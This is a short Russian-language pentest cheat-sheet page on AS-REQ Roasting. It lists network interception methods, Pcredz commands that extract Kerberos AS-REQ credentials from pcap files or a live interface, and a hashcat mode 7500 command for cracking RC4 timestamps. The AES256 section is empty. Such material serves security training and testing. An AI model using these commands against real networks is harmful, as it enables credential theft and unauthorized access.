search

AS-REQ Roasting

hashtag
Условие для проведения атаки:

  • Получение KRB_AS_REQ сообщения с включенной предварительной аутентификацией

hashtag
Варианты выполнения условия:

  • Сообщение можно получить в результате атаки, направленной на перехват сетевого трафика (ARP spoofing, ICMP redirect, поддельный DHCP сервер, IPv6 spoofing).

  • Сообщение можно извлечь из дампа сетевого трафика (PCredzarrow-up-right)

hashtag
Команды для проведения атаки в Linux:

Извлечение аутентификационных данных из pcap файла:

Pcredz -f $filepath

Извлечение аутентификационных данных из всех pcap файлов в папке:

Pcredz -d $dir_path

Извлечение аутентификационных данных при прослушивании сетевого интерфейса

Pcredz -i $interface_name -v

Hashcat:

Если штамп времени зашифрован с использованием RC4:

hashcat -m 7500 $AS_Req_rc4_hashes $dictionary

В случае AES256:

PreviousKERBEROASTINGNextCREDENTIALS

Last updated